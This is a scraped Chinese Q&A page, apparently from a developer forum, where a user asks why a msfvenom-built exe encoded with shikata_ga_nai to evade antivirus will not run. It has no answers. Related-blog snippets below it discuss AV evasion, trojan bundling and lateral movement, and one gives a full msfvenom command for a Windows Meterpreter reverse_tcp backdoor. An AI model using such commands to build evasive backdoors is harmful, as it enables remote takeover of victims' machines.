今天用msf使用x86/shikata_ga_nai编码器进行病毒免杀后虽然成功的绕过了杀软的检查,但是生成的exe文件却无法打开了。
关注
码龄 粉丝数 原力等级 --
- 被采纳
- 被点赞
- 采纳率
已结题
使用x86/shikata_ga_nai编码器绕过杀毒软件后却无法运行
收起
- 写回答
- 好问题 0 提建议
- 关注问题
微信扫一扫点击复制链接分享
- 邀请回答
- 编辑 收藏 删除
- 收藏 举报
0条回答 默认 最新
报告相同问题?
提交
- 2022-07-10 10:49夏集罢侬的博客 免杀技术在网络渗透的实战中十分实用,本文将介绍使用msfvenom自带编码免杀工具进行编码免杀,从而实现绕过杀毒软件获得shell的具体方法。 按照文中所讲述的方法制作的木马载荷可以绕开国内所使用的大多数杀毒软件,...
- 2020-03-09 22:56p0inter的博客 上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 由于本机测试时只是安装了360全家桶和火绒,...
- 2022-04-22 10:24嗯光的博客 抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms...
- 2022-05-09 23:49Bruce_xiaowei的博客 到目前为止,杀毒软件主要使用了3种技术。如下: 基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,并将其加入...
- 2022-09-03 21:53@Camelus的博客 自编码处理自捆绑+编码多重编码接口下载式签名伪装式
- 2023-10-02 11:28WelK1n_的博客 完成360免杀、横向移动PC机、黄金票据伪造Vulnstack2一刷:360免杀该靶场360版本较低,使用MSF自己的编码器就能绕过横向移动PC机器CS横向移动没有什么难度,mimikatz拿下域内用户密码后就能psexec横向移动到DC、PC...
- 2024-05-26 13:46不知归期的迷途羔羊的博客 web_delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set target 0或1或2来设置是使用php还是python还是powershell等。meterpreter是一个高级、动态、可扩展的payload,简单理解是...
- 2019-05-16 14:55子曰小玖的博客 https://www.offensive-security.com/metasploit-unleashed/msfvenom/ ... kali自带的生成木马工具----Msfvenom Msfvenom是有效负载生成和编码的组合。它于2015年6月8日...
- 2022-09-08 22:32夜yesec的博客 而shikata_ga_nai是msf中唯一的评价是excellent的编码器,这种多态编码技术使得每次生成的攻击载荷文件是不一样的,编码和解码也都是不一样。还可以利用管道进行多重编码进行免杀。 目前msfvenom的encoder特征基本都...
- 2022-01-23 20:23月色晚来枯的博客 一、生成Windows后门程序获取shell 使用msfvenom制作简易后门程序...msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe
- 2024-07-13 21:16momozsdf的博客 木马免杀需要对木马进行多次编译,并对一个拥有数字签名的程序进行捆绑。可以绕过*60
- 2020-08-07 23:57二进制学习委员的博客 文章目录生成常见的反向连接木马反向连接的优势:Windows:Linux:MAC:PHP:Asp:Aspx:msfvenom参数介绍生成免杀木马360免杀木马腾讯管家免杀木马免杀木马测试写在最后 生成常见的反向连接木马 连接一般分为正向...
- 2025-07-03 17:07Super-Jan的博客 那么想法来了,可以使用msfvenom生成shellcode然后我们把shellcode代码复制过来替换上图中的代码,不就可以实现shellcode的利用了吗。我们可以使用–platform指定很多平台,上面的例子指定的是windows下的,我们同样...
- 盛透侧视攻城狮的博客 如何通过制作windows和linux客户端恶意软件进行渗透MS模块命令使用方法等具体操作详解步骤等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;...
- 2022-05-24 19:45黑色地带(崛起)的博客 【渗透工具】MSFconsole进阶:Encoders(编码器模块)
- 2014-03-16 14:41weixin_30650039的博客 msfpescan ,msfencode 等命令使用 首先下面额指令都是我用到时记录的,可以说是经常用到吧 先找到memdump.exe文件: C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe 在CMD下 ...
- 2025-10-12 15:28缘友一世的博客 杀软绕过技术和MSFvenom编码器学习
- 2025-09-10 07:20pepper的博客 本文深入解析了绕过杀毒软件与Shellcode注入技术,详细介绍了使用msfvenom生成shellcode、编码器的工作原理,以及使用Backdoor Factory进行木马工程的完整流程。通过分析代码洞穴和多种优化策略,如多次编码、洞穴...
- 2023-02-03 12:08Cllmsy_K的博客 前言 仅供学习,入行前的笔记,关于免杀效果请勿喷 用法 针对windows 使用x86/shikata_ga_nai生成payload,参数-i为编码次数,我这里设置15次,并使用了-b参数去掉payload中的空字符。 多重编码: Payload: ...
- 没有解决我的问题, 去提问